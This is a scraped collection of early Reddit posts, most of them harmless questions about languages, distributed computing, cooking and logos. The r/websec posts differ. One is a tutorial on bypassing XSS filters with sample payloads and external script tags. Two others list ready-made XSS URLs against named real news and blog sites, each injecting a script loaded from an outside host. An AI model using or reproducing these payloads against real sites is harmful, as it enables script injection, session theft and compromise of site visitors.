1) Straight up remove certain characters or strings from being processed. Many sites just will remove the '<' character, or any string between '<' and '>'. Other sites will attempt to remove quotation marks or '/' marks. Both of these are bad methods because any person experienced with finding XSS exploits can create exploits without them.
2) Filter only when the input is sent through the search box, but not through a get parameter. Example of this would be me searching the string '';!--"<XSS>=&{()} in the search box of the site and getting the the url:
This happens a lot, and if I see a site do this, I immediately try pasting the string into the url. Then, it will come out as:
If I do this, and their filtering method before was their only protection, the site is now vulnerable
3) Protecting against only certain ascii strings or characters. For example, many sites don't allow the '/' symbol, any quotation mark, or the string '<script>'. Usually, if you replace your query (in the url, not the search) with the hex code equivalent of query, you can evade this. [I use the hex converter on this page](http://ha.ckers.org/xss.html).
**Special strings to evade poor filtering**:
*The no quote query*:
*The no '/' character query*:
<body onLoad="alert('xss');">
<iframe src="javascript:alert('xss');">
*The no '/' character URL*:
var slash=unescape('%2F');
var url='http:' + slash + slash + 'malicioussite.com';
[\*Note I just found this today, read more about it here.\*](http://www.reddit.com/r/xss/comments/aeos5/ebaumsworldcom_xss_vulnerability_interesting/)
*The no quote external script or image*:
<script src=http://maliciousscript.com/xss.js>
<img src=http://imagesite.com/image.jpg />
I hope these tips have helped anyone who read this, too learn more obscure techniques like I mentioned, check out [ha.ckers.org's cheat sheet](http://ha.ckers.org/xss.html). If you have questions about anything I mentioned or if you would like to add to what I said leave a comment. If this post is helpful to enough people I'll consider writing another more advanced one in the future.
**EDIT**: Damn you grammar. | r/websec | post | r/websec | 2009-12-15 | Z0FBQUFBQm5LN1VxdWpMWXEzQkNmRVo2Z3BTTDRUMWNzWGxFT2x6WTRHUUd5Mjc0UWdpUWhPMEtuNk04TGtDbnRPWi1iMDVxemdkdTE2WWNhc0gxWDhGRHdybnBvQ3FzN0E9PQ== | Z0FBQUFBQm5LN1ZodkhMbnN2bVZ1N3BMSWw0X1lsUTZHdW44LU14cDNqWWtKdXFsT252cWxpd0lib01CY1FaeWVrdm12Mi1hNnZLOEZ0dXV5NUNQRk1ZWmFLOG9KTVR3RTVMdFRNZFNWa1daN0ZQNGxIS3MwNXpIbF9PVkVTS2FUbmZBTmFMQXMxWE1ydFA0UmNOWmQ5VWstNG03ZUN0TmFPdlVMZW1lTEF6MlBxajZ5dVRVRUN4WG82eHl2SzhxLU9vTXR1dEZpcnJCSWNhcUpsZFZVbUlzUzhDNm9xRUx3dz09 |
Does anyone know of some good resources for learning Vietnamese? I've had trouble finding good material on/off-line. | r/learnanewlanguage | post | r/LearnANewLanguage | 2009-12-17 | Z0FBQUFBQm5LN1VxVk9MVHpvU3R2d1ZTakRMbTRHWkVObnkxRXJ5NUNIOXJIVlEtNnVFdGVzWncwY0tQeHF1VkxYd0cta3dUMW04WXd1SEJVOTd6RFVyVzBGTmlvbTUyUFE9PQ== | Z0FBQUFBQm5LN1ZoaFR0MUJRYVJNRm5MWjgyQWFSNUpJdXBSQjhXOHRKRE4wWUkyRHRUUjE4U0I2RW9NRHNHZzYtWTRLc1BMY2g3NXk5OS16WjNfaUQ2SjAtNUQ5RDJvT0hMV0FJa0xOVWJVcmdVSGVvemlBSlJJMTNsOXlxbUlLMzR5QUV1dlVERGlfOXBQanVXTDF0bF8tTzR1WWtzejBxY0lWYTJLS2JucDVyN1lSeUlHTXN3PQ== |
I thought I'd share my experience from today volunteering for the campaign. I [signed up](http://wildfire.schiffforsenate.com/an/landing) and began making calls today.
* 6 messages left
* 2 'not home's
* 1 'I'm not interested in politics'
* 1 person genuinely annoyed just to be speaking with me
Not bad for my first time... I think.
In each of the 4 cases talking to a live person, I mentioned I was volunteering for Peter Schiff's Senate Campaign, so at least they heard his name and that he was running for Senate, and anyone who listens to more than 3 or 4 seconds of my messages will hear the same thing. And that's what we're most trying to accomplish at this stage of the race, name recognition. I'm hoping to get an engaging conversation going at some point, or at least a question or two thrown at me.
I hope they do something about that script though; it sounds so cheesy over a phone call. So does the voice mail script. It needs to be something a little more casual in order to sound more natural to say over the phone.
Anyway, I hope this post has encouraged others to call, or maybe to share their experiences. Perhaps we can give each other some good tips. I'd also love to hear about a call that goes well. | r/peterschiff | post | r/PeterSchiff | 2009-12-18 | Z0FBQUFBQm5LN1VxMjdDUlB6Z09CbWU4UVFTWk1xRExkRWFBczkyTkFjWWxpNERmenRLb09LQUdyOFRiUzVNR1FfQkROQlBROE1JekdoTHBUNlE0NDV2ZTN3RzhnZ3hQZ1E9PQ== | Z0FBQUFBQm5LN1ZoRmFCemQ5dGwzUXVZeEViNWV0VWVJb1dDVHdfTXFnMk9rZFpvaUY0djZiZTNWVUo4cWlOSGY2T0F2ajZSNjR5TFgzX2NKdmVtVDBMQmkwaHhDbUlRNHBGSnlrZXBSa3N1eXBhTEZSLWFremt1VTJyUUVzcWRtMDBncWZ0ejZRUlRqQzI5YnI3QjhIbW84TWhxaDJaVjh0Y0JsUXJCQkxnQVZRZkpLZnVDY2lTRDJ1MGdscnNSbFJsWDZDZzB0ZmdDdEx1cDRaNXBsWmtOV2lJalM4RXYxdz09 |
We should set up some guidelines to make a model for disclosing vulnerabilities. Things like time to wait after disclosing he vulnerability, whether or not to censor the data collected (obviously yes for passwords etc) and the injection points, the way it was discovered etc.
I propose that we:
* Disclose the vulnerability to the webmaster and wait a week(7 days) until disclosing or until it is fixed.
* We should post the email conversation if there is one, especially if it is interesting.
* Include the injection point and vulnerability
* We should include the server banner (if found) so that we'll know which software would be more or less vulnerable than others.
| r/websec | post | r/websec | 2009-12-20 | Z0FBQUFBQm5LN1VxZFRoRlN3dlVyaTZRdDZoclUtVU5WWmhLS1ZsVWVFZWtqN0gwVUtGZUJHWW93YzR6VENXWmpuc2NnVHlHYl9nY2E1R0UtZE5nQjJ4OV9FQnBWajhrWlE9PQ== | Z0FBQUFBQm5LN1ZobV9xa01CMVBQUEFOcW1xVmtWNVFyVmZ1X3o0Q3B1QUlJX0o1cDlZcVBiYldKQy1TQlVMQUNUX1ZOVzFoSnlLcFl3VUdNZWlvWjNlbXVTTHM0d3pkeFAzQ3dsMmhPalBGV1RqRWNJaUQzSHZXM2lRN1JqQl9TOWZMcmZxbEloY2JCbkZDY2djdWIxYzhITFppOGtxSk00R09PVmhSbEt0LWVqWDRfbFhLSzIxcmEyTmlIMDhZZUpzU2d4M2VYX3cz |
I'm learning dutch, and I'm still a beginner. My college is offering German classes, and I was wondering how close were the two languages.
Will learning german help me with dutch or will it be harder for some reason?
I'm guessing it won't have any effect, but meh... I'd like to have reddit's take on this. | r/learnanewlanguage | post | r/LearnANewLanguage | 2009-12-27 | Z0FBQUFBQm5LN1VxellCb1pTU2h3NE5YTmtsN3JYREp1SVBMNzZ0eGJaUW9aX1N0MnQ3VWtSelZNNkRIa3Q1ZW8xWXlrNW9BTFdTMTQ4c21ja2xSWGN5b2luZDdTNlRIOVE9PQ== | Z0FBQUFBQm5LN1ZodXZIYnZzLXVOX25ZU1ZQWnc5V19vSlhKVUZfVVk3YmJPTk9NNkI3ZkJSREMtVUJPOHNGbG5TdUtxZmZFQ280NS1pb1AwVFRNbER1YXBFWEg5R1pRUWNQbl82ckE5UzhEYTJFdDZSejAzLTVUbVAxR2FtNDJELU16bHlydzdIaDlGM00xc1NBNEloSEQtS1hhZF9sdEthN1RLV0V0OU5tZml2NzBQS3NGT3lOU01lS0U2dGlHbVExelJ4dzQyeThHWGRMYUJHdk9qUzVYU1dWd3p1VkZsUT09 |
I just watched Inglourious Basterds and loved the use of French and German. I'm going to work on a transcript of all the French parts and what I can of the German. I enjoy being able to understand everything that is said and think this would be a fun project. Any takers on transcribing the German? | r/learnanewlanguage | post | r/LearnANewLanguage | 2009-12-29 | Z0FBQUFBQm5LN1VxWExHVWdNWkRwRlNmaUNNYkZ1c2t1V1pGSHlHV1kxTFREYk56Q0pkbk9Yc01fYnJNX1QxNmhxRGFhSkZZRmJfTGloaV80N1h2YkZfNWdCd1pfUjhRQVE9PQ== | Z0FBQUFBQm5LN1ZoaGoyYkRtbmRRcWVmT0VST1EtM1ZGUkZYNzEzRFlwNkVrNWdFVHE3RzBZMGFQNGJ6SThTTzNoaEpSX1JqSDVINjhIN2drc3lYM2ZjR0wxWDItN3J2Y3duWTZobmZXMlNuZHdVbEVqNTNwYWVSdzZDSmVLWGpSd3NUUjdHNmxRUk5MOGM5ZTVBaDBsaWF2VGxKNDY2ZFNBU004ajEyMkJtTFFORXlqQ1plS0ZTZ1F2dXFHVHdaUjRtWF9QU05TTzRW |
All these sites use the same engine, so they all have the same vulnerability.
* [Gizmodo.com](http://gizmodo.com/tag/"<script src="http://www.yourjavascript.com/07920020021/xss.js" />/)
* [Lifehacker.com](http://lifehacker.com/tag/"<script src="http://www.yourjavascript.com/07920020021/xss.js" />/)
* [Gawker.com](http://gawker.com/tag/"<script src="http://www.yourjavascript.com/07920020021/xss.js" />/)
* [Jalopnik.com](http://jalopnik.com/tag/"<script src="http://www.yourjavascript.com/07920020021/xss.js" />/)
* [Jezebel.com](http://jezebel.com/tag/"<script src="http://www.yourjavascript.com/07920020021/xss.js" />/)
* [Deadspin.com](http://deadspin.com/tag/"<script src="http://www.yourjavascript.com/07920020021/xss.js" />/)
| r/websec | post | r/websec | 2010-01-07 | Z0FBQUFBQm5LN1VxellCTDBFdEZDMlBidWRsWnJSQlBtVGRXbk51Sk1TQ29UREkxRkhZejU2U2oxSXRDVFZIT0ZhcFlhNEJSTUQ1UWV0eWNqWFdkb1E1dmNHZWhjQ296dkE9PQ== | Z0FBQUFBQm5LN1ZoaXhfdlVZbFNnNm1RY3R2eUpnNkI5cDRNMGc4UEU5a2lGTWVuc3F5ZUhaVl81VFpVcXBpNy01TWx1SWNLSGVSb2pKaHRUQTA5eTgwN1JsWlpldXZJeGtJNmZYOVotcVNreTd6NDJfOVZnUDVkLUs3NzlGbjNuS3M3U2dWeUVacWVtR1dYcE10SlhqcUFUVEphMWNfRkNxcy05Nks3X1FvdUppVEFhMUczRzlJNkhGYlVveG5xMWJjaWVkRlY0b1RM |
All these sites use the same engine, so they all have the same vulnerability.
* [Engadget.com](http://engadget.com/search/?q=';</script><script src=http://www.yourjavascript.com/07920020021/xss.js />/)
* [Joystiq.com](http://joystiq.com/search/?q=';</script><script src=http://www.yourjavascript.com/07920020021/xss.js />/)
* [Downloadsquad.com](http://downloadsquad.com/search/?q=';</script><script src=http://www.yourjavascript.com/07920020021/xss.js />/)
* [Tuaw.com](http://tuaw.com/search/?q=';</script><script src=http://www.yourjavascript.com/07920020021/xss.js />/)
* [Autoblog.com](http://autoblog.com/search/?q=';</script><script src=http://www.yourjavascript.com/07920020021/xss.js />/)
* [Asylum.com](http://asylum.com/search/?q=';</script><script src=http://www.yourjavascript.com/07920020021/xss.js />/)
| r/websec | post | r/websec | 2010-01-07 | Z0FBQUFBQm5LN1VxajR0OThHVEJ5cFRwZ3gxYlU3ZFlfQzdEUXpOTmlNbTZNNVlfOElvWEZYdUJaRzkwY3VWNEJ4TWVWeW5KRkdqZ0lRZ0RGenp4LTl1OEFMVXFBLXhuTVE9PQ== | Z0FBQUFBQm5LN1ZoaC1YZlhqY1d0b3JEVU1pRTE3Y0dzSTBhbXZlZHg5blVZWXd2c0JYeU9zNmVwYTBPSjBSNk03Skp3NDdMa1NfajJZVDBTNnpHSkhuWWw4cXZmZExiN2xtQVFQZVFreWoyMWEtU080dDgwYWhiakVLMlpKeUdsVDhURWNrVkE0d0Npd3RPNEdOTEdhdVNmVm1iM3B5ZlQxb2pwdWNGenFDc2VpY3VXQWdDcjIxUklYRXRKdUJ1UjZpT0NuWVFOZGla |
Just found out this subreddit doesn't exist, so I created it.
Now, we need people reading it! Suggestions are welcome! | r/doesanyoneknow | post | r/DoesAnyoneKnow | 2010-01-15 | Z0FBQUFBQm5LN1VxRW9ZRHF5UER0Wm9xdlprcjdvWUZNSzV0QzV3LWI4SzI1aFpfRlFrTTlEOGNad2wtVzNQT2JpSENGYmNwNk1hWnFmVWFobnhaUnduY0J4UlZZTnJDY3c9PQ== | Z0FBQUFBQm5LN1ZoOHI3RDB2VFluRTlLWFhQRlFrbm9ja2lNU3BKMl90RVBTRi1xSFJvLXVIelotWkVfTDBxYXdoRDVJbzYzOHFRbWJRaXZtekdoMFdtRU1CNVVZZ0UxLVU1TFc3eU5PUmlqVHF5bzJvaE1CMTVVVHJreHJDcFJSd3pZamtNaUFINlFlRU1FSGd1Rm11U01ZTXFiUzBiWFBHbHRRbzNBTWhraTktUDlia3N1bU4zdkpaZFduOXh6bGN0NmJPZ1dBd2NnSmxzMVdWRHFLOEdUZk9fYlZqR0JKZz09 |
Not hosts that charge too much for what they offer, or hosts that offer way too little to handle dynamic content. Basically, I'm looking for somewhere that I can pay decent money to carry an imageboard. Not an imageboard as popular or as bandwidth-guzzling as 4chan, course. | r/doesanyoneknow | post | r/DoesAnyoneKnow | 2010-01-15 | Z0FBQUFBQm5LN1VxTjA5bFk3aDV3WGRydHZ0R3RidVJvOHdDMUpKTmNuZHU4TXhWVWhsX0pRSTBncWptdTQ1U0RMV1ZVN1ZnY3doMWVTWnl6TGJfSHM5d2NHRUtTQVhpSnc9PQ== | Z0FBQUFBQm5LN1ZoOXFFUnFpaHFmYkN4OXZfUFJiZHJ0OXlqak1TeHVmV01TVUhxWnNyWFJEbWJrV19yMTVsTWJqLW5MSnJmdEhCamR6OFRrUzZLaXUySWZYbk5sdXIwaUxFLU1Ia1ZHSHBZa3lEa1p6NlVNbnhvVEZTQjNuVkZuS0dra1BESE5IcHpQcWJ5N1FvTGE4bWF6NXR5NXFwclpuS1NyZ1pmaldZdXhrY19rOVZONlJqcVBITVY0RTI5RVZWSGhkVjdWNnZV |
Join! It's winter for most of us so there is no excuse. Ask here for help, no matter how simple.
Currently placed ~1300th with over 2.3 million points
* [Detailed statistics](http://kakaostats.com/tsum.php?t=50959)
* [More stats, graphical](http://stats.free-dc.org/stats.php?page=team&proj=fah&team=50959) | r/distributedcomputing | post | r/DistributedComputing | 2010-01-15 | Z0FBQUFBQm5LN1VxMDlyZTZzR180UTZUdkViUWVacl9zZk9aaHdkX3lQeDlLenRFRVhUUXR4eWNkNVZWcW5la2ZxQVhIU0pKSDZhMHFYblZlN0toMHYyTGkxekZ6Ynd6MUE9PQ== | Z0FBQUFBQm5LN1Zod0ZUTTE3bEN6MTI4dV9sVXRBQUFReW9MVGNjcGdxQ19ISU5DMGdjaFhhcWhVSXVRUXVUY1pFZ1hMWlJDQlY3cUQwTjdYdG1raUtsUEVLRGhrQnIzZEFUcDNaSzZ4WTVRQzdMNE5EdXA5WHc2ZGJXWkJLM1VBS2U2R3VWXzJJLTZNM01XMnk0c1JmT0hremZpRHJWM3VTZ3JNcHZVMFEyY1JnblQzV0NLRDlZQlAtMl9wZ2xNNUdmSktuYVZiRVVX |
I thought it would be interesting to see everyones configuration as far as hardware and software goes. The points per wu seem to vary pretty wildly so it'd be nice to match up performance with the wu's people seem to get.
Edit: Also, since this is distributedComputing in general, tell which @home projects that you do work for. | r/distributedcomputing | post | r/DistributedComputing | 2010-01-15 | Z0FBQUFBQm5LN1Vxek90b29BbVZqUE5kUk0zdXRTbHZZSzdNLV9DR3RkSTJWbk5WUUdsWWJYZGVvUDloeUhkVTlpX1FKb3hKUVpja3Rvd3Nxd2hHOWZHN18wMmRiZ3FXSGc9PQ== | Z0FBQUFBQm5LN1ZoNGtnc0U5b2xsLVdZNnpTVlk2Q0ZPd1loaVF3SEhWNzFUSzdjY3VuSzdtMEF0b1o2U2Nhb29RNVNtdWJPellzU3VMSjhGbTBfYVJueHc4YmlNU1FEQ094MnN4YWxublpkVGwyMUU2dHdBcXRlMVdZaExwT1NVSS1qYXBLX0RpOThZNnNxTUdla2d1cm5VOFJsemZqaUFYQkZjcWVESEVma29ZczZZazZlNFRaeHlkZkFvLXE2TXNSbHBDaWdQazNEa0R3NlVwTXp0Vld5cURoaXpUbzJJUT09 |
[Here's a clip] (http://www.youtube.com/watch?v=qKRhMTvXbLY) of the specific episode I'm looking for. Flower Power. | r/doesanyoneknow | post | r/DoesAnyoneKnow | 2010-01-16 | Z0FBQUFBQm5LN1VxWW9ENUZnYVRFVGdfQ25XaV9aVXJvN3ZkbDh5RTlJeTg5TzRVeTQtNEcxQ0s4aWpfMk03QmVncFExSTFfZEVJelIzQTQwSVVvbEwzakhWdEFZTFU5cVE9PQ== | Z0FBQUFBQm5LN1ZocmQ5MFdYZnJhM1VNaENwbi14QlRzSlNKNXliTDRicC1DMW5TdXlfaGV0Q1NIaUdPNDd3U0dwV1NZQTItYmI0UGJXamNpdDNsLWhoak5fUzdMT0xwVlVvU2ppNFV4OXRVX1JjNm1STmdDQUl4X3BoejM1Q3VRSEZsUUl1clN0cVR1MDctR2llTlFSXzdLbHRCNU5QbEU3M21SV0tBNmloSWRhcmpCMlZlV1NVYTJHcC0yUU5XU1JFZVZsRU5yTUl4SU4yU2VZaDZfYjlmVGM1QzJuZ0hRQT09 |
Every time I break them over the pan, some bullshit happens (such as breaking the yolk). How can I prepare perfect fried eggs? | r/doesanyoneknow | post | r/DoesAnyoneKnow | 2010-01-16 | Z0FBQUFBQm5LN1VxbmV4NmJjUWJUZ2NjXzI0SXFSTU11bkN5eHhOQXpYSFp1SkphUkpOSXd0ZkswaVJGM2ZNeVYzVVFFSGJzczVCMzBtejZNb0ZZUzRCQVNTam1KcElNN1E9PQ== | Z0FBQUFBQm5LN1ZobnVjdkZhNllMWWtBM2tLYlJlbmNpZVN3Slp0Wk9ZSjFPckE4bGNPOVpJcnZzRXVCVjEzOHg0bXhjRXo1Wmwyckxkd2s1YTBTZ1RjaTZCVC1nWVBGcXZsdC1NbnVLRWI0VTJPSlhKU0VOZ0NqdDM4Z0d1WVBzTWlLbDNubEphYmY2SmRwV29UNzBCR0NiQmx6Z3FLWWtvdlFkMzNzcGk2WUFFTGprU3EwczN6S0Mxd1JlQ0ZEQjgtR2k0Q0xKVWZEUlVZY1J1bEdLQnJGSmwyeklXNzQwQT09 |
Hell, is it even possible?
~inb4fourtytwo | r/doesanyoneknow | post | r/DoesAnyoneKnow | 2010-01-18 | Z0FBQUFBQm5LN1VxeU9KLUF0YlN0TF9CbmlGNHV5RlZIQWFWNjRGdTdqTnI0OVZ5dk9VYnF0Y0haSmFyU0J3dHN1UFA3RVRoVDAyblh5b2NOVkhQb3pOTW5SdkM1ZklNU2c9PQ== | Z0FBQUFBQm5LN1Zod0N0NjE0bzhTcGx3eXp1aGdtTjIyVFIwUXJKX0prVUh1SW1qVnJfWUdzajlkcEdocENEdHNfQmFjMzljSlZGcUhHcnNDZ2RhYXJYY2tMWm5OMTc2MTg0aDBsVFBUcDYzQmw3ME04U19JZ0ltV193dk5VVlRDOUlSLWd5OWZYVE1TcklhZDZZd2NGcTV0VkZQTVF1OUNMWlZSUGM0QTJ6YmxJSlpVcGF0TWdDcVVlYldFU1IzSzhIYldfOURQSEZJ |
Would anyone like to make on for that? I know this isn't the biggest sport in the world, but it starts tomorrow and I would love for it to be the Reddit frontpage logo for at least one day... | r/logo | post | r/logo | 2010-01-18 | Z0FBQUFBQm5LN1VxQVByS2RDY1BXdnZmN2NsblBJMDZFbkg4Y3ducGtzNkR4UklpNGE0SzVta3Q5WjZBLVRtU0M3SWdRSFRJTzdKWDI5VXRNVWpxaWF0ZTFETW9UaTNLTmc9PQ== | Z0FBQUFBQm5LN1ZoQ3NnLV9xSjBRNmx2dnJ0dERabVVzMGV3bllVQWwzbDA2WkRPRnNsZmxkazdaS0ZveGRwaUMxMUphX3cxWjYyUlF5UTJPX0NMSHdoR3V0aWdjR1FHbHdUYkoxYVh0YWUyT1UtZlVnbDQ3R1dCY1h3MWxIa3JQbmdmcG1JTEpISU5XenNSdzc4SExYODNQRzg1TElWSlVUX3ZCMzlsaVRJcXVJRFFOVHdCRWdJajd1Ui1yQURUSWh3b3lmVXJScVZq |
Seriously. My family moved up to NH when I was 10. Here I am 12 years later, but I have trouble finding things to do other than snowboard, hike, or go to a bar. Admittedly all lovely things, but all good things should be in moderation...otherwise I get bored of them. | r/new_hampshire | post | r/New_Hampshire | 2010-01-19 | Z0FBQUFBQm5LN1VxRDNySjMweHFfZEJYYjFwZXNCclRtd3dVb1VVWU1LMk5DcjFXTTZyUlRqS1lUazBBNzNxeGVHOGNTdzlDMW40VzVzd0JXZWpqOUszVnJNeDJ5bFBEaEE9PQ== | Z0FBQUFBQm5LN1ZoNF9DYWVBb3RleFZJY3VqcktYNkFfOTRnMlZWd0FZWEtfRFJZUlhubTBsT29zMHVVZHltWVBTSXJfTDZ6RnEyZWJXRW90RzBfM3FNQ3RxUXRZNmZHeUhkOXpMdm1ia0cxeVdBNW1vVlFNUzlMb0h6ZlhqRkgtRG1nRVBteXE1NTZGaDJ1SDBNbGpURlJURHpIZWROM29nSG9wWUtRNHEyb2d4Nm1XT0h5SUhFVUpxT0tsVURwWjk3ZnB3c0xXRE9QSkdsa0s5c2ZlY1cxWGI5OHg1a3lxQT09 |
I've not been able to download work units for folding@home since around midday today. Anyone else having problems? It looks like the servers should be working. | r/distributedcomputing | post | r/DistributedComputing | 2010-01-19 | Z0FBQUFBQm5LN1VxMEtCQl9qWEFxa2xYUlRPc29qRW1nRGZRTFFJLTBsVWZXb3FRbjh0Y0ExaXBhdkE5ZmZXaXljNnRlTm9mNzctaGRqMGtvTnJvVVB2aDNmdlh2NllaOEE9PQ== | Z0FBQUFBQm5LN1ZoMmxPbUhyM1ItWDhlWGRjV2V2UklJaGQxWW9TS2k2TVZQenh6NVJkd2xVRDdJTk5xSWpnZnZnNmZiUjF4c004QktFNS1lNFZ3dVpzMWxMekdrRjlMQ2RRMzkzUl9QdmZjWVBxTjZNMGdIbDRvX0szX2ZMTDNuZ21kSHhYT2hneUdjNmcyYWlBdjVXQVIwMDRSME9EZ1Z5ZUx5eWVCRWFLdElLZFJsdFFSck1mblRYNUVQM0FFQmx3SWVBeHdsT1l4RndLY1RDV2JZSlBkVFQ2UHQtSkl2Zz09 |
Some random letters being typed from keyboard and maybe some mouse clicks. Also if it could be put in a loop and will not be noticable when being repeated. I won't be explaining why I need this, I'm sure you will come up with some good ideas. | r/doesanyoneknow | post | r/DoesAnyoneKnow | 2010-01-20 | Z0FBQUFBQm5LN1VxNnVTU294Vm5rNEFnMng1YU1MTEpFR2ljRlBWbUdvX3hXS2hLMFVUc0ozWFEwNmMxeXROMWtiLXdFeExpYk1pNVY2OXkxRzlDYjBhcEFlbU9LRFdsckE9PQ== | Z0FBQUFBQm5LN1ZoVHQwMElobFdSSVRvVkd6MjdEU3VWZlRadXkxUmZiU2ZfMnhvc0FUVkZlUHo4ZUJSRUc1M0ZjLWVLV2VRN2JkUzRpMlJHQU9xU1VudHZCQnpqd01iYVMtVGxVOU1wUHhSb0VYenpELXJ6a3VPTUgwSEtmN3U2bEJPc0NCWmZkTENmTEpOdXd6RjNPdk84dndHWC1jbzg1ZlRKcE9kcE5fWElTb0hLc0QtN3I4RWthUVlSQWFHTF9xczlsOG1BV2pLakp2dXNtcWhkdkhpQl9takFKcTR3UT09 |
There are no French classes near where I live, and I can't download videos due to my crappy computer, and as much as the French news is helping, I like to have a more immersive learning environment on the side. So, I've opted to lurk on French forums, building up my vocabulary, occassionally posting, etc...
I've found this really helpful in learning French, only problem is, I have no idea how to pronounce what I'm typing. Are there any websites out there which allow you to type in words and listen to an audio file of the correct pronunciation?
Merci d'avance. :) | r/learnanewlanguage | post | r/LearnANewLanguage | 2010-01-22 | Z0FBQUFBQm5LN1VxUlI1VE0tTjFscmVoQXNJUDR2bkVZNlNoaXpoYWxoeW5xQkl5WDM3X2NhQ1ctN0ppcGMyQUlTRmtCV1MtQUp3cjVYbERESk1iVEVHeHBBYXRkOG9Qc3c9PQ== | Z0FBQUFBQm5LN1Zob2tZNGxtT04zWTZjaTFVaHVJdWpIV0F5ajcyN2FqWnBDVkUwTUdDaHY3N09DS2p1YVY2Rno1RUVITmZHWGVNZGQ3eHJxY21wOHVPcnBwN1p4SExUNk1Na0JWdzk1dUlvSnpCV1RnS3lFaEVhNHRSV043bFZVZmg5VzRfNWY3Yy14bHhxaTUxcXFyYjY0Y3otQUpwZkpzVkhyaHJTdzBEcmlKTVR2Y3ljS3BsMGJsc3BTMUFVSFA3bVNNcjkyd2VFTVA3c2M2TEpvS1RjODBVcmR4N0Qzdz09 |
I will be going to Haiti in sometime soon(ish) with the Salvation Army to help provide relief for the earthquake victims. While they'll probably be sticking me in a kitchen with nothing but English-speaking people, I wouldn't mind knowing a bit of Haitian Creole. Can anyone recommend any websites or video tutorials?
EDIT: I had one of those sentences where two thoughts collided into a grammatical train wreck. | r/learnanewlanguage | post | r/LearnANewLanguage | 2010-01-23 | Z0FBQUFBQm5LN1VxS3VndllVMThBdFBoYUY1Ung4c0xSM1BjczJsSktRSDBnNGRhb0d5ZXVjTlkyM3hGTGlzLXlXX0RodVJJSV9oaXRpZl90QUtMMXVnUkF6amRlSkR1ZFE9PQ== | Z0FBQUFBQm5LN1ZoV1NvLVZmakRuTDI0dXQwc2FzSlUtS2hmU0VBSzBGQXBKelAwLXVuS2xzRG9LcVY4cjVxNlZ3d2QwYlZWZURpOXVlS2VOdFRLRF9LRkY0cGpGN05GZ3l1R1hYblNxQmFjY3c4WmZCOUlxaE1RU0ZuTVBYeW40WUFzY092TFl4ckE2ZWtNUHFUUHJWMU9ra09Pd0szMktzWmNUNGkwRWdtakdPODFVb1ZTSTVXMWczVFhVbTdtWnVJa3MtSDRiYWZDcno5WlRwWVlQQ0FBaWQxUHZyS0xtdz09 |
So could you give me any tips and tricks? Picking a [locking picking set] (http://www.lockpicks.com/14piecepickset.aspx) up and i'm reading the MIT lock guide :)
EDIT: Links doesn't work :( | r/locksport | post | r/locksport | 2010-01-25 | Z0FBQUFBQm5LN1VxVnFJbmJGSUowWjlyckhObTEtSUhFVk82VTBoVU94blVQOGFMRXl1b1RRaHpqenFpWGs4elBrRWdMMjlaS3l5a25zZi1IRGpvSVN6QUd3QmlMbnVUQWc9PQ== | Z0FBQUFBQm5LN1ZoOGg2c0huai1wUE5Zd3h0V0QyN3dCc29qLUNTT0dONzduOHB2NklHeW9DMGdhcWpvdnYzUFBjQlU0NnpDMGswX1A4OTRORnVWRk9FVnN0RE1PeWxCNGJKV0RKc29CMmVIajRpeUdwY2FNNkpYVERiVThQaUhlTExWN25JNEQ2NVI0TDlyMGtBbGhEa3R0UlZ0ZnYzMGZCaXg3a1VrcEI1aGE5MzFhMXdSMmRvdlAzODN4SGxtXzVnZFFiZ3Q4N2hV |
Just started up the subreddit and am anticipating some traffic between here and March. I'd love it if you could make us a sweet logo to go with our week of fiestas and music! | r/logo | post | r/logo | 2010-01-28 | Z0FBQUFBQm5LN1VxcndGRXRDTGU0c0dwQU53Y3FSU2pCeFBqcnJTWVZzNEZRb2hWT2xoUkpublNzN1R1aU9sQVdQSmVfUTBnNzR0VTAydnhpNmtiRzRRZEdtWTRuUUhHMHc9PQ== | Z0FBQUFBQm5LN1ZoVkxxZS00NlFPZG9ZN204eGMwcHlPLWwtVlF1NVBzekN6eHd4X05ndjZSSUNIcF81MDdObWVsdGlwTXBGYVVad1VNTEswN0ozUUkxb0QyQ0o4c25yZmlRektZcFh3RDkwLWNfZTlrQVhRbHZLN3ctM2JkcmpFdW5WUHlQRjB0ZEVhUlZ4Wmo2WkVWVGJvZFRVMXg0SUZHb01hOGpVNE1BYUx1Umg5aWgxMDhOTTJtd3dDVEZmVTJHOXJIamdsM2dG |
I know I am going to catch all sorts of flak for this, but I honestly don't know, and my internet search prowess is failing me. Thanks. | r/doesanyoneknow | post | r/DoesAnyoneKnow | 2010-01-29 | Z0FBQUFBQm5LN1VxUlozS0Nzb1BhdUZmX2FzdkFNYnpVcWdYa2hOQ2RKNEZES1BVTnVVbEszbG00VTFRUnBLdmlYZXBtcjlEcTlxbHJtaHdXVUJZMTNEQV9SOHZxTGlva3c9PQ== | Z0FBQUFBQm5LN1ZobUxwb2lXYjFNc1hEVFVpWHdYS3VjWENMRUs1RnNfeGFsS1lraHJkYW5uLUtxOGJaYmRNNU1RWWxIbXdWYU9NclBkaWJwR2dhbFRpbkxwLVFWcGlMN01yZWMzUW93Q0ppNTNYWV8wdGNZWUhNMDVFMG5DR2hJeHpSSlFDSlFUcV85WXdwS0dBYTNkZ3dLa1M0ekEwUHVrNXV1dXE5WjA5RGtONEYyQUxwMDVHNWRhczk4QkxfNTdVLTNzOWh5dC1QaUI2TEl4VjQtd3VzbUp1TUpzazFTQT09 |
Excellent overview from probably the best single source of information about Early Music on the web I've found. I've found a huge amount of great music from the [Recordings of the Year](http://www.medieval.org/music/early/years.html) page. | r/earlymusic | post | r/EarlyMusic | 2010-01-30 | Z0FBQUFBQm5LN1VxNEVhWjBWc3FxNE5WbDNRNUZfSnNaSTRTM0dVbHNab0F6dzk0Rlk3VzRXbldNVlpTWmEwU0hnVk9fNXBxeFExUVJYSE5qcTZCSFhSNkppWUctZGpDQmc9PQ== | Z0FBQUFBQm5LN1ZoeWNHeVJBNHJzZGw0R1NrcUYyandacXJtS2xrTFo4XzdETjZfTVllLWdMNGl3VkxkN2dHM2g1TS1FVXBEZmNueFpiYV82SDNPcjFBbDNZaXhOTFVUTVcxWjFVclRhSGNaX1lFa1E4emN1NG9obW9KQnl6b2VRblBCRWt3LVBsdk5odVFPVmtZc051ZU9SMmszRE1QWUtjcW91c2FaTGp4QjFIYy1VbDRyR3YtRUdXSHJoUzVYNWktZmlHMWdfVHZI |
